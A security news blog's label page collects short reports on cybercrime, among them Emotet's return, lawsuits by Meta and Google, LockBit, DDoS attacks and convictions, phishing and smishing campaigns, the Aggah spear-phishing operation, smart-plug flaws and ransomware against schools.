Search This Blog

Showing posts with label Cyber Criminals. Show all posts

Emotet Malware: Shut Down Last Year, Now Showing a Strong Resurgence

 

The notorious Emotet malware operation is exhibiting a strong resurgence more than a year after being effectively shut down. Check Point researchers put the Windows software nasty at the top of their list as the most commonly deployed malware in a March threat index, threatening or infecting as many as 10% of organisations around the world during the month – an almost unbelievable figure, and more than double that of February. 

Now, according to Kaspersky Labs, a swiftly accelerating and sophisticated spam email campaign is intriguing targets with fraudulent emails designed to swindle them into unpacking and installing Emotet or Qbot malware, which can steal data, collect information on a compromised corporate network, and move laterally through the network to install ransomware or other trojans on networked computers. 

Qbot, which is associated with Emotet's operators, is also capable of accessing and stealing emails. In a blog post this week, Kaspersky's email threats protection group manager, Andrey Kovtun, stated. In February, Kaspersky discovered 3,000 malicious Emotet-linked emails, followed by 30,000 a month later, in languages including English, French, Italian, Polish, Russian, and Spanish. 

Kovtun wrote, "Some letters that cybercriminals send to the recipients contain a malicious attachment. In other cases, it has a link which leads to a file placed in a legitimate popular cloud-hosting service. Often, malware is contained in an encrypted archive, with the password mentioned in the e-mail body." 

The spam email often claims to include essential information, such as a commercial offer, in order to persuade the recipient to open the attachment or download the harmful file via the link. "Our experts have concluded that these e-mails are being distributed as part of a coordinated campaign that aims to spread banking Trojans," he wrote further. 

Cryptolaemus, a group of security researchers and system administrators formed more than two years ago to combat Emotet, announced on Twitter this week that one of the botnet subgroups has switched from 32-bit to 64-bit for loaders and stealer modules, indicating the botnet's operators' continued development. Emotet immediately resurfaced in the malware world's upper echelons. Europol, along with police departments from the United States, Germany, the United Kingdom, and Ukraine, completed a multinational takedown of the primary botnet deploying Emotet in February 2021. Raids on the accused operators' houses in Ukraine were part of the operation. 

The raid, according to Europol, substantially impacted Emotet's operations, which were used to infiltrate thousands of firms and millions of computers around the world. However, in publishing its March threat index, Check Point Research stated that Emotet resurfaced in November 2021 and has gained traction after the Trickbot botnet infrastructure was shut down in February. It is once again the most common malware. 

The researchers wrote, "This was solidified even further [in March] as many aggressive email campaigns have been distributing the botnet, including various Easter-themed phishing scams exploiting the buzz of the festivities. These emails were sent to victims all over the world with one such example using the subject 'Buona Pasqua, happy easter,' yet attached to the email was a malicious XLS file to deliver Emotet." 

Meta Takes Legal Action Against Cyber Criminals

 

Facebook's parent company, Meta Platforms, announced on Monday that it has filed a federal lawsuit in the U.S. state of California against malicious attackers who ran more than 39,000 phishing websites impersonating its digital properties to trick consumers into disclosing their username and password. 

“Today, we filed a federal lawsuit in California court to disrupt phishing attacks designed to deceive people into sharing their login credentials on fake login pages for Facebook, Messenger, Instagram, and WhatsApp. Phishing is a significant threat to millions of Internet users”, states the report. 

The social engineering strategy entailed the construction of rogue websites that tried to portray as Facebook, Messenger, Instagram, and WhatsApp login pages, prompting victims to input their login details, which were subsequently captured by the defendants. The unidentified actors are also being sought for $500,000 by the tech behemoth. 

The assaults were conducted with the help of Ngrok, a relay service that diverted internet traffic to malicious websites while concealing the exact location of the fraudulent equipment. Meta stated that the frequency of these phishing assaults has increased since March 2021 and that it has collaborated with the relay service to restrict thousands of URLs to phishing sites. 

The lawsuit comes just days after Facebook revealed it was making efforts to disrupt the activities of seven surveillance-for-hire firms that generated over 1,500 phony identities on Facebook and Instagram to target 50,000 users in over 100 countries. Meta announced last month that it has barred four harmful cyber groups from attacking journalists, humanitarian organizations, and anti-regime military forces in Afghanistan and Syria. 

“This lawsuit is one more step in our ongoing efforts to protect people’s safety and privacy, send a clear message to those trying to abuse our platform, and increase accountability of those who abuse technology. We will also continue to collaborate with online hosting and service providers to identify and disrupt phishing attacks as they occur. We proactively block and report instances of abuse to the hosting and security community, domain name registrars, privacy/proxy services, and others. And Meta blocks and shares phishing URLs so other platforms can also block them”, mentioned the report.

Google sued two Russians hackers

Google has filed lawsuits against two Russians - Dmitry Starovikov and Alexander Filippov. According to the company, they are behind the activities of a botnet called Glupteba.

The corporation claims that Glupteba has infected more than a million Windows devices worldwide, the increase in infections can be "thousands" daily. The botnet was used to steal Google user account data. Most often, the infection occurred after users downloaded free applications from unauthorized sources.

In addition to stealing and using other people's data, Glupteba was aimed at covert mining of cryptocurrencies and redirecting other people's traffic through infected computers and routers. Using this method, illegal traffic can also be redirected to other people's devices.

Google notes the sophisticated technical complexity of Glupteba. It uses a blockchain, the decentralized nature of which allows it to effectively protect itself from work disruptions. For the company, this is the first case of fighting a botnet on the blockchain.

The main infrastructure of the botnet is now neutralized. Those who managed the network from infected devices no longer have access to it. However, the company notes that this statement is valid only at the moment.

Google assumes that it was Starovikov and Filippov who managed Glupteba, relying on data in their Gmail accounts and Google Workspace office applications. The company insists on reimbursing them for damage, as well as a lifetime ban on their use of Google services.

According to experts, this could create a positive precedent. If the Russians really manage to be punished significantly, this will significantly weaken the community as an attacker in cyberspace. At a minimum, the hackers' sense of impunity will disappear. You can read about how Google representatives tracked hackers on the company's official website.

HHS Cybersecurity Agency Issues Threat Briefing on LockBit Ransomware

 

A security report on LockBit, a ransomware gang that reportedly published a new variant, has been issued by The Health Sector Cybersecurity Coordination Center. The cybercriminals were behind the highly reported cyberattack on Accenture this summer, wherein the corporation was supposedly threatened with a ransom demand of $50 million. 

LockBit ransomware is a malicious program that prevents users from accessing their computers in return for a ransom demand. LockBit will automatically scan a network seeking valuable targets, spread the virus, and lock all computers that are accessible. This ransomware is employed in very specific cyberattacks against businesses and other organizations. 

LockBit was introduced in September 2019 and began advertising its "ransomware as a service" affiliate scheme in January 2020, according to HC3. 

In May 2020, it began collaborating with Maze, another ransomware organization, and in September of the same year, it debuted its very own leak site. LockBit v2.0 was released in June of this year. Furthermore, according to HC3, it employs a two-pronged extortion scheme involving the StealBit malware. It has improved encryption and circumvents user account control methods. 

"Threat actors continue to view unpatched systems as an easy, if not preferred, method of intrusion," wrote officials from the cybersecurity arm of the U.S. Department of Health and Human Services in its brief. 

It moreover relaunched its affiliate program, wherein affiliates determine the ransom, then choose a payment system, and receive the majority of the money before actually paying the organization. Armenia, Azerbaijan, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, and Uzbekistan are among the Commonwealth of Independent States countries where the program does not function. 

Based on an interview with a LockBit ransomware operator, the organization concluded that the malicious actors looked to have a "contradictory code of ethics." 

According to HC3, healthcare facilities are ideal targets, but the LockBit affiliate showed "a strong disdain for those who attack healthcare entities while displaying conflicting evidence about whether he targets them himself." 

"The U.S. also has lucrative targets, but with data privacy laws requiring victim companies to report all breaches, the incentive for such entities to pay the ransom is likely somewhat reduced," said HC3. 

"Cybercriminals are avid consumers of security news and remain up to date on the latest research and vulnerabilities, weaponizing that information to use in future attacks," it wrote. 

Threat advisories on various ransomware organizations, including BlackMatter, Conti, and Hive, have recently been published by the federal government. The alerts, however, haven't stopped the flood of ransomware news. Hive hacked a Missouri health center earlier this month and published patient names, Social Security numbers, and medical information on its blog.

NSA’s Cyber Chief Warned About the Increasing Cyber Threat

 

On Wednesday the 29th of September, the chief of the cyber branch of the National Security Agency cautioned about the growing number of digital dangers and threats that these cybercriminals pose. 

Rob Joyce, Director of the NSA Cybersecurity Directorate, stated during the ASPEN Cyber Summit in Colorado that nearly every single government in the world today has a cyber exploitation program. 

Joyce has been a special assistant of the president and cyber security coordinator of the National Security Council in 2018, with many other responsibilities in the nation's leading e-spy agency. 

“The vast majority of those are used for espionage and intelligence purposes, but… there is interest in dabbling in offensive cyber and outcomes. The difference between the top of the list and the bottom of the list, usually, is scale,” stated Joyce. 

There are some “high-end, sophisticated small actors, but they’re confined to whatever that national interest is that they’re aimed at so we see less of them.” 

Joyce also gave his evaluated statements on the so-called "Big Four" and the latest internet business of the foreign states who were historically the digital opponents of America — Russia, China, Iran, and North Korea. 

Starting with Russia he said that, it's the distressing force. Often they attempt not to boost their activities but to pull others down. They are still extremely active in intelligence-gathering efforts targeting vital infrastructure and countries. The problem is that they employ disruptive effects all around the world aggressively. The organization saw indications of U.S. vital infrastructure pre-positioning. For this everyone must strive against every item that can't be permitted. 

Further, talking about China he noted that, Chinese is off the charts, considering the scale and scope. The number of cyber actors from China is growing all over the world. NSA respected them less than that from four or five years ago to the present day, the changes as perceived. They have always been wide, loud, and boisterous, and what the organization discovers, the elite in that group is the elite if one has such a vast resource base. 

“The high end of the Chinese sophistication is really good. We’ve got to continue to understand, disrupt and then find ways across the whole of that technology to kind of push back… Yes, defense is really important, but you also have to work to disrupt so that’s the continuous engagement strategy out of the [Defense Department] and the idea that we got to put sand and friction in their operations, so they don’t get just free shots on goal,” he added. 

Later he made statements about Iran saying that Iran is still operational in cyber activities. Certainly, they were the first and foremost nation when everyone spoke of a bank distributed denial of service operations and the Shamoon Wiper malware. However what NSA observed is that they often concentrate very much on regional matters, at present. Their attention was not as broad on the impact. But they are capable, especially because their decision is less judgmental, and most crucially because it is a realistic measure. Iran sometimes does not appreciate how much it has done to, or has gone far as to arouse the wrath and concern of the larger community. 

Lastly, he told that North Korea remains extremely focused on the regime's income creation, as North Korea can not be affected even with several sanctions. They, therefore, had to develop ways to create cash, trade and realized that it is simpler to steal Bitcoin than to steal from Bangladesh Bank. They didn't attack the largest banks as hard, since in the crypto realm they made their required money. 

“The commercial firms were dealing with a lot of North Korean issues back when the [Covid-19] vaccine was an issue; they were going after the intellectual property of vaccine makers. So, still active, still a threat, very capable but mostly focused on crypto exchanges and creating money.” He added. 

Russian Electronic Voting System Struck by 19 DDoS Attacks in One Day

 

Yandex, the Russian technology and search engine powerhouse, disclosed last week that it had been hit by one of the world's biggest DDoS attacks ever recorded. 

A distributed denial-of-service (DDoS) attack involves flooding a website or service with a large amount of internet traffic until it stops working and eventually goes down. Cybercriminals have been known to create botnets and launch DDoS attacks using hacked systems or vulnerable/exposed Internet of Things (IoT) devices. 

Russia's remote electronic voting system has now become the next victim of the campaign, as to what appears to be a continuation of targeted DDoS attacks. 

According to reports, the 8th Russian State Duma (lower house) elections took place between September 17 and September 19. Voters had to head to the polls to cast their vote for the heads of nine Russian regions and 39 regional parliaments. 

According to Russian news agency Tass, remote electronic voting took place in six locations, including Sevastopol and the regions of Kursk, Murmansk, Nizhny Novgorod, Rostov, and Yaroslavl. 

Around 19 DDoS attempts were thwarted, according to Mikhail Oseevsky, president of Rostelecom. The head of the country's major digital service provider, Rostelecom, told the reporters at the Central Election Commission's information centre that some of the DDoS assaults were very short, spanning only a few minutes, while the biggest lasted 5 hours and 32 minutes. 

“It (the DDoS attack) began early in the morning and ended in the middle of the day,” Oseevsky disclosed. 

Many of the country's digital resources, including the elections, state services websites, and the CEC's portal, were attacked, according to Oseevsky. 

He continued by stating that there have been several efforts to launch large-scale attacks on these resources. The department, on the other hand, was well-prepared to combat and minimise the threat, according to the president. 

The assaults arose from a number of different countries which include: 
  • India 
  • China 
  • Brazil 
  • Russia 
  • Germany 
  • Thailand 
  • Lithuania 
  • Bangladesh 
  • United States 
According to the elections commission, three targeted cyberattacks were documented from abroad, two of which targeted the centre's main website and the third was a DDoS attack.

35 yrs Of Imprisonment for the Administrator of 200,000 DDoS Attacks

 

After a 9-day trial, a California jury that held two distributed denial of service (DDoS) operations administrators, found him guilty. Matthew Gatrel, a 32 years old man, of Saint Charles, Illinois, operated two websites that enabled payment to users to launch over 200,000 DDoS attacks on private and public targets. 

Court filings disclose that since October 2014 Gatrel has operated DDoS services. DownThem and Ampnode are the two sites being used, which allowed the operation of DDoS attacks. Gatrel has used DownThem to sell DDOS services subscriptions (sometimes referred to as "booters" or "stressers") and AmpNode has supplied clients that wanted pre-configured servers with DDoS attack programs and lists of vulnerable systems that may magnify the attack. 

The researchers have discovered that they have over 2,000 registered clients in databases of the DownThem booter portal. As per the documents, more than 200,000 DDoS attacks are launched by users. The targets covered households and schools, universities, websites of municipal and local authorities, and financial organizations throughout the world. 

“Often called a “booting” service, DownThem itself relied upon powerful servers associated with Gatrel’s AmpNode bulletproof hosting service. Many AmpNode customers were themselves operating for-profit DDoS services” - the U.S. Department of Justice.

Several subscriptions can be used by clients, each with different attack and offensive capabilities like length, force, or the potential of competitor attacks. 

If the victim is accessible, the service would deploy "reflected amplification attacks" from AmpNode attack servers, employing "hundreds or thousands of other servers connected to the Internet." 

In this operation, Gatrel hadn't been alone. In 2018, Juan Martinez of Pasadena assisted him to operate the DownThem website. 

Gatrel is faced with a maximum statutory imprisonment of 35 years scheduled for January 27, 2022, where sentences for the federal prison for three crimes of which he was found guilty are : 

  • one count of conspiracy to commit unauthorized impairment of a protected computer.
  • one count of conspiracy to commit wire fraud.
  • one count of unauthorized impairment of a protected computer.

However, Juan Martinez has already pleaded guilty, unlike Gatrel, to his final hearing on 2nd December · he can face a statutory maximum term of imprisonment of 10 years in his final trial.

43% of all Malware Installations are Concealed in Microsoft Office Documents

 

Companies have now employed hundreds of cloud applications to use due to the transition from work from the office to remote work, many of which may be vulnerable to cyberattacks or exploitation. This has increased the attack vector and exposed them to a slew of new threats. 

Although infiltrating office documents with malware has been around for a long period, it is indeed very effective in duping individuals. After embedding a hostile macro into an office document, malicious actors transmit the infected file to thousands of other people via email and wait for potential targets. A macro is a collection of commands that are packed together to perform a task automatically. 

Thus according to current Atlas VPN team research, malicious office documents account for 43 percent of all malware installations. Dangerous office files are common amongst cybercriminals because they can evade suspicion by most antivirus programs. 

The research is based on the Netskope Threat Lab Cloud and Threat Report: July 2021 Edition. It examined office documents from all platforms, including Microsoft Office 365, Google Docs, PDFs, and others. Only 14 percent of all downloaded malware were hostile office documents a year earlier, in the second quarter of 2020. Following that, in the third quarter of last year, the percentage rose to 38%. This growth was mostly affected by working remotely, as attackers discovered that malware-infected papers have proved to be beneficial. 

The effectiveness of EMOTET appears to have spread swiftly among cybercriminal gangs, motivating other hackers to adopt a similar approach. Another reason harmful documents succeed is that they can avoid detection by antivirus software and appear to be from a reliable source. 

Malware-infected document cyberattacks are designed to exploit the user's potential incapacity to perceive the danger. Only a blend of cybersecurity knowledge, training, and security software could provide the highest level of protection.

Fraudsters have taken advantage of Microsoft Office and Google Docs' popularity by introducing malicious code into the documents. To protect users from malware attacks, organizations must design and maintain a cybersecurity plan that addresses both the technological and human components. 

Driver's License Exploitation Scams Surge

 

The Covid epidemic has provided a ripe opportunity for cybercriminals, who are taking advantage of internet information from outdated driver's licenses of targeted individuals. 

According to Stateline, the “phishing” scams benefit from the fact that several nations have made emergency declarations permitting driver's licenses to remain in force beyond expiry dates. With the expiration of such renewals, drivers must now ensure that their licenses are updated, but scammers are taking full advantage of that shift, according to Stateline. 

In conventional phishing, cybercriminals send malicious links or attachments via email, and victims inadvertently click on them. Fraudsters use messaging to conduct their operations, which is known as "SMS phishing" or "smishing." 

As per state motor vehicle agencies, driver's license phishing frauds attempts to steal individual identities and personal information, that have already been sprouting up across the United States. Iowa, Minnesota, Ohio, Vermont, and Wyoming are among the states in which the frauds have been detected until now. 

Scam artists send out SMS or emails making false claims that the target's license needs an urgent update, as some of the information is missing, or even that it is about to expire and will be invalid within a few days. When a person clicks the hyperlink, a Google Forms spreadsheet with personally identifiable information such as a Social Security number and birth date is often opened. 

“It’s despicable,” said David Druker, a spokesperson for the Illinois secretary of state’s office, which issues driver’s licenses. “It’s just outrageous that when the country is going through the COVID crisis, people are taking the time and energy to steal information from others.” 

A large number of people in Illinois, according to Druker, reportedly obtained texts and emails from fraudsters posing as the secretary of state or employees from the state transportation department. Druker also added that he had no idea if anyone else has succumbed to the ruses. 

Upon learning well about phishing and smishing, Illinois officials notified the FBI and IRS, who had collaborated with Google to remove the bogus webpages. According to Druker, the authorities have discovered 1,035 sites so far, and Google has halted nearly 900 such websites. 

As per a notice issued earlier this month by the U.S. Department of Health and Human Services' Office of Inspector General, fraudsters are now employing door-to-door visits, along with telemarketing calls, messages, and social networking sites, to conduct COVID-19-related frauds. 

“Do not provide personal, medical, or financial details to anyone in exchange for vaccine information, and obtain vaccinations from trusted providers,” the Office of Inspector General urges. 

“Posting content that includes your date of birth, health care details, or other personally identifiable information can be used to steal your identity,” said the Inspector General’s office.

Threat Group Aggah Targets Industries Via Spear-Phishing Campaigns

 

A spear-phishing attack that seems to have commenced in early July 2021, targeting various manufacturing industries in Asia has been identified and reported by Anomali Threat Research. 

During this campaign, the strategies, methods, and procedures detailed in the report correspond to the threat group Aggah. The investigation further unveiled several PowerPoint files with harmful macros that employed MSHTA to launch a PowerShell script to charge hex-encoded payloads. Through the findings as well as the analysis based on the campaign's TTP, researchers evaluated that the threat group behind the security incident probably is Aggah. 

Cybercriminals employed numerous vulnerable WordPress websites to target Asian producers with a new operation for phishing attacks that deliver, the Warzone RAT, a freight for sale on crime forums, researchers stated. 

Warzone is a malware commodity having hacked versions available on GitHub. The RAT utilizes the Ave Maria stealer's code repeatedly. Warzone RAT's features include scale privilege, keylogging; remote shelling, file download and execution of files, file managers, and network endurance, as per the researchers.

Based on the recent research by Anomali threat detection and security agency, the threat organization Aggah, which is believed to be associated with Pakistan and was identified for the first time in March 2019, has delivered the RAT to manufacturing enterprises in Taiwan and South Korea. 

Aggah is an information-based threat group discovered by researchers from Palo Alto Network’s Unit 42, for the very first time. The researchers believed the activity to be a campaign against organizations in the UAE. In-depth research by the very same team revealed that it was a global Revenge Rat Phishing Campaign.

“Spoofed business-to-business (B2B) email addresses against the targeted industry is activity consistent with Aggah,” Tara Gould and Rory Gould from Anomali Threat Research wrote in a report on the campaign published Thursday 12th of August 2021. 

Aggah, which normally seeks to steal information from targets, was also previously considered to be affiliated with the Gorgon Group: a Pakistani organization recognized for targeting the Western governments. This relationship has still not been confirmed yet, however, the Anomali researchers believe that the Urdu-speaking group came from Pakistan. The most recent campaign of Aggah included the Taiwan-based manufacturing company, Fon-star International Technology; Fomo Tech, a Taiwanese engineering company, and the Korean power plant, the Hyundai Electric. 

Researchers have indicated that the latest campaign of Aggah for spear phishing began with a bespoke e-mail pretending to be from "FoodHub.co.uk," a UK-based food delivery service. “The email body includes order and shipping information as well as an attached PowerPoint file named 'Purchase order 4500061977, pdf.ppam' that contains obfuscated macros that use mshta.exe to execute JavaScript from a known compromised website, mail.hoteloscar.in/images/5[.]html,” researchers stated. 

“Hoteloscar.in is the legitimate website for a hotel in India that has been compromised to host malicious scripts,” they said. “Throughout this campaign, we observed legitimate websites being used to host the malicious scripts, most of which appeared to be WordPress sites, indicating the group may have exploited a WordPress vulnerability.”

Russia Based Company, DDoS – Guard gets Targeted by Cybercriminals

 

Leaked data for sale through forums and marketplaces in cybercrime appears so frequent that it is essentially unknown, except for the choice of an individual victim. However, these leaks might show that a site or service has been compromised – possibly without the wiser being the operators. 

One such prospective victim is the apparent Russian company DDoS-Guard, which protects against distributed denial-of-service attacks. The company's supposed client data was presented on a cybercrime forum for sale. 

The DDoS Guard offers DDoS protection, network content delivery services, and Web Hosting services. It is a Russian Internet infrastructure company. 

On the 26th of May, a user put on Exploit.in "the full dump on the popular online DDoS-Guard service" for auction, with an opening sale price set at 500,000 dollars, or a blitz price set at 1.5 million dollars, with "buy it now." However, later on, the auction was started at $350,000. 

Singapore-based cybersecurity firm Group-IB reports that beyond DDoS defenses, "DDoS-Guard also provides computing capacities and obstructs the identification of website owners of hundreds of shady resources that are engaged in illicit goods sale, gambling and copyright infringements." "

We've seen several rogue websites hosted by DDoS-Guard," says Reza Rafati, a senior analyst at Group-IB's CERT-GIB incident response unit in Amsterdam. "They were almost impossible to take down. Their answer to our numerous complaints on them protecting illegal resources is that they are not the owners of these websites. Such a safe environment for illicit online activity doesn't do any good for the global effort against cybercrime." 

The DDoS-Guard customer database listed "all info such as name, site, real IP, payment info, etc." in the Exploit.in leak. The user claimed that several renowned websites, including RuTracker.org, which is a BitTorrent Russian tracking service, are also featured on the client list. The listing says that the DDoS-Guard "infrastructure, backend, front end, and network filtering/blocking" are all included in the sale. 

A DDoS-Guard Spokesperson nevertheless rejected the Exploit.in claims of the seller. "We are aware that malefactors are trying to sell a certain database. Our company has not experienced any data leaks," Ruvim Shamilov, DDoS-Guard's PR manager, stated. 

SecurityTrails includes Hamas, which is the Palestinian militant party that rules Gaza, as well as enormous sites of squamous names that are potentially used by fraudsters, like "bitdefender-centrals.com," "nortoncomsetupz.com" and "garmin-express.support," which are attributed to DDoS-Guard by the domain and IP Address service SecurityTtrails." 

For DDoS-Guard users, soon it would be possible to identify anyone who has been operating sites on their service, depending on who takes their hands on the client base dump. Yet legal enforcement agencies are probably already informed, says cyber-security expert Alan Woodward. 

"Anything that is done at scale, and particularly where it is crime as a service, is bound to attract the attention of the police," says Woodward. In addition to finding ways to interrupt services connected with illegal activity, law enforcement organizations have shown themselves to follow users of the service.

Threat Actors Use Marvel's Black Widow Movie To Spread Malware

 

Marvel's Black Widow film has finally been released in theatres and online streaming platforms after being delayed for over a year due to the COVID-19 epidemic. Unfortunately, Marvel Universe fans aren't the only ones who are enthusiastic, as the launch of the Black Widow film has sparked the interest of several fraudsters and hackers. 

According to research conducted by cybersecurity firm Kaspersky, threat actors have been unlawfully monetizing interest in the upcoming film for months. 

Kaspersky warns of Black Widow movie-themed malware: The film was released on July 9th in the United Kingdom, however, it's yet to be aired in many other countries. Researchers have discovered malware downloads posing as the new Black Widow film that is already spreading on the internet. 

Several Black Widow-themed phishing sites are running, according to the company, with the motives of obtaining user credentials. One of the websites examined by researchers promised viewers an early screening of the film in exchange for registering on the site. Users were requested to provide their banking card information during the registration procedure to validate their residency region. However, they later discovered that money had been deducted from their account and they still didn’t get access to the movie. 

According to Kaspersky experts, there has been an increase in attempts to infect users who are keenly awaiting the new film's release. They first saw the rise in infection attempts following the film's formal announcement in May 2020, then again around its original November 2020 release date, and finally in May 2021. 

Since the movie's release date was pushed back to July 2021, hackers have tried to take advantage of the misunderstanding by infecting 13 percent of streaming services and even launching the movie's downloadable files. 

Kaspersky security expert Anton V. Ivanov wrote, “Right now, we have observed intensified scamming activities around Black Widow, the release of which, fans all over the world have been eagerly anticipating for a long time. In their excitement to watch the long-awaited movie, viewers have become inattentive to the sources they use, and this is exactly what fraudsters benefit from.” 

Precautionary Measures: 

Scammers are not only utilizing phishing websites to deceive innocent users, but they are also redirecting executable files disguised as movie downloads. To remain safe, avoid files that have a . EXE or .MSI extension, because movie files generally have .MP4, .AVI, .MOV, .WMV, or .M4P extensions. 

Furthermore, pay special attention to the website URL you visit in order to see or download the film. Scammers frequently make minor modifications to the domain or movie name, so double-check the address to rule out any bad activity. 

Finally, use anti-malware software that has a phishing site detection capability.

Social Media Influencers are the Latest Target of Cyber Criminals

 

The number of cybercrimes and scams is rapidly increasing with the advancement of technology. The police said that a new cyber fraud with social media influencers has been detected. 

There are a great number of followers of social media influencers on social media and companies are paying them regularly for their handles to promote their products. Many famous people get roped in, too. 

Cyber fraud is a kind of cybercrime fraud that uses the Internet to hide information or to provide erroneous data to knock victims out of money, property, and heritage. 

Cyber Law Expert N.Karthikeyan notes that mainstream media cannot include an advertisement on gambling or false investments. Such imaginary operators can utilize these influencers of social media who are unaware of the consequences. There are influencers on social media that only promote fictitious mobile apps. Fraudsters also send dubious links as supporters of influencers on social media. Once the victims click in and the details are registered, the fraudsters acquire complete control of the influencer's page or channel. They'll then post their content – that can be anything.

However, the Cyber Crime Cell officials noted that no specific complaint had yet been made on the matter. 

A woman social media influencer who was a candidate in recent elections said, " After uploading my affidavit into ECI website, I had three lakh downloads. I got good reviews on a social media page but only one person alleged that I had hacked the ECI site- which was baseless. He went on leveling allegations on me. I just ignored it." 

With the increase in such cyber frauds, a Youtuber who himself was a victim of this, stated that the overwhelming majority of influencers on social media are being used by fraudsters. They at times typically represent themselves as an established company or brand and appeal to influencers with lucrative publicity deals while proposing to administer the ads on behalf of the influencers. Later, they gather personally identifiable information or passwords from social media and seize complete control of the website or handle used by the influencers. 

"We have lodged a complaint against an Instagrammer who specifically targeted women influencers. He texted asking them to join in an Instagram live. If they accepted and came on live, he would level baseless allegations. If they didn’t agree to live as he was the stranger, he projected them as scammers, " said Joe Praveen Michael, an event manager.

Smart Plugs Used by Cyber Criminals to Break into Victims Property

 

Inexpensive intelligent connectors are a big threat to cybersecurity and can effectively be used by cybercriminals to hack anyone’s device or even gain entry to their residences, experts say. 

Usually, modern Internet-based devices can send data (using HTTPS) with stronger passwords and follow the appropriate safety practices using encrypted channels. Techradar reports that Sonoff and Ener-J smart plugs worked the opposite and that a large security issue was ready to be exploited. 

The security firm A&O IT Group documented its security analyses of two smart plugs, Sonoff S26 and Ener-J Wi-Fi, that are cheap and easily available at large. 

These smart connectors, which the customers will be able to purchase for just 10 dollars on Amazon, eBay, and AliExpress, can also be used to gain access to the Wi-Fi network of the targets by the hackers. This is because the router is communicated through port 80 via these devices, as well as because they have failed factory credentials, to send unencrypted HTTP traffic.

As soon as the attackers get Wi-Fi passwords, they can log in to the target network and do all sorts of activities from it: video and audio received from porters, insecure smart devices being regulated, confidential data downloaded, or even traffic monitoring from many other devices. 

They may also use Wi-Fi to download illicit information from the internet or undertake attacks on computers of other users that have little risk of getting caught. This is particularly important if the victim has items such as smart door locks, or video surveillance on the very same network. In this case, an intruder already knows how long the citizens are out and may even break into the property. 

The A&O IT Group says it has both reported vulnerabilities to Sonoff and Ener-J, but it has yet to receive any company's reports. 

To mitigate this issue, expertise from CNX Software suggests the fastest way is to set up a Guest SSID for IoT devices to prevent the sharing of the same network by other important devices. 

The most recent report on users of Eufy safety cameras that were later fixed in security feeds and the smart plug vulnerabilities that remind users that network security rests on the safety of all connected devices — something that users must remember when having smart doors, smart cameras, or other sensitive devices when using the same network.

Ransomware Attacks Targeting UK’s Education Sector Increased, says NCSC

 

According to the warning by GCHQ's cybersecurity arm, NCSC, there has been a substantial spike in the number of ransomware attacks targeting the education sector over the last month, just as schools were getting ready to resume in-person classes. 

Ransomware attacks on the UK education sector have been on the rise, according to a new report. This includes developments seen in August and September 2020, along with attacks that have occurred since February 2021. It also offers mitigation recommendations to help in the defense of this sector. 

According to the report, senior leaders must recognize the magnitude of the threat and the ability of the ransomware to cause serious harm to their organizations in terms of information exposure and access to important services. 

Ransomware encrypts servers and files, making it impossible for businesses to provide services. Cybercriminals are anticipating that the need for schools and colleges to provide instruction would lead to target organizations succumbing to extortion requests and paying a bitcoin ransom in return for the decryption key required to recover the network. More importantly, cybercriminals have begun to warn that if the ransom is not paid, they will disclose confidential data taken from the network during the attack. Many elevated cases have arisen in which cybercriminals have carried out their attacks by exposing confidential data to the public, mostly via the darknet's “name and shame” websites. 

"In recent incidents affecting the education sector, ransomware has led to the loss of student coursework, school financial records, as well as data relating to COVID-19 testing," the agency said. 

Ransomware attacks can be crippling to businesses, taking a considerable period for victims to recover and restore vital services. These activities can also be high-profile in nature, gaining a lot of attention from the public and the media. 

There are many ways for ransomware attackers to gain entry to a victim's network. Remote Desktop Protocol (RDP) is one of the most commonly used protocols for remote desktop activities, according to the NCSC, allowing staff to access their office desktop computers or servers from a remote device over the internet. Ransomware attackers often use insecure RDP and virtual private networks (VPN) configurations to gain initial access to victims' computers. 

"This is a growing threat and we strongly encourage schools, colleges, and universities to act on our guidance and help ensure their students can continue their education uninterrupted", says NCSC. 

To protect against malware and ransomware threats, the NCSC suggests that businesses must adopt a "defense in depth" technique. Having an effective plan for vulnerability management and deploying security fixes, protecting remote web services with multi-factor encryption, and installing and activating anti-virus programs are all cybersecurity guidelines for schools, colleges, and universities to secure their networks from ransomware attacks. 

Are Media Agencies the Next Target of Cybercriminals?

 

There is no denying the fact that cybercriminals have been exploiting the trust of people in media agencies. However, the ongoing situations have seen an incredible surge in cybercriminals needing to utilize each possible way to target media agencies.

Aside from direct attacks, they have even misused brand names to create counterfeit identities, which are then used to target 'potential victims'.

A couple of incidents throw light upon how and why these threat actors have set their sights on the media industry.

Some of them have been directly targeted generally through ransomware attacks.

Ritzau, the biggest independent news agency in Denmark, was targeted by a ransomware attack, prompting the compromise and encryption of more than one-fourth of its 100 network servers.

The computer servers at the Press Trust of India were also attacked by LockBit ransomware, which kept the agency from delivering news to its subscribers.

A few attackers very cleverly utilize the 'pretense' of media agencies to plan out their attacks.

Some time back, TA416 Able was found carrying out spear-phishing attacks by imitating journalists from the Union of Catholic Asia News, endeavoring to target the scope of victims, including diplomats for Africa and people in the Vatican.

Another incident happened when the U.S. seized 27 domain names that were utilized by Iran's Islamic Revolutionary Guard Corps (IRGC) for carrying out secretive influence campaigns, in which a few domains were suspected to be veritable media outlets.

OceanLotus had set up and operated a few websites, professing to be news, activist, or anti-corruption sites consistently. Furthermore, they traded off a few Vietnamese-language news websites and utilized them to load an OceanLotus web profiling framework.

Subsequently keeping these events in mind, experts recommend having sufficient safety measures, like frequent data backups, anti-malware solutions, and implementing Domain-based Message Authentication, Reporting & Conformance (DMARC).

Furthermore, recommendations were made on carrying out tests to distinguish and eliminate the risks of domain spoofing.


Russian citizen arrested in the United States on charges of organizing a cyber crime


According to the Ministry of Justice, 27-year-old Yegor Kryuchkov tried to pay $1 million to an employee of a company from Nevada in order to introduce malware into its computer network. When the FBI joined the investigation, the Russian tried to run from the United States

A Federal Court in Los Angeles has arrested a Russian citizen, Yegor Kryuchkov, on charges of conspiring to commit cybercrime. This was reported by the press service of the US Department of Justice.

According to the Department, 27-year-old Kryuchkov in the period from July 15 to August 22 this year tried to bribe an employee of an unnamed American company located in the state of Nevada. The statement claims that the Russian offered him $1 million for participation in the implementation of the fraudulent scheme.

The Ministry of Justice reported that Kryuchkov allegedly planned to load malicious software into the computer system of this company. This would allow him and his associates to gain unhindered access to company data.

Last week, Kryuchkov was contacted by the Federal Bureau of Investigation (FBI), after which he left Reno (Nevada) and went to Los Angeles in order to leave the United States. The Russian, according to the Department, asked his friend to buy him a plane ticket.

Kryuchkov was detained in Los Angeles on August 22. According to the Ministry of Justice, the Russian entered the United States on a tourist visa.

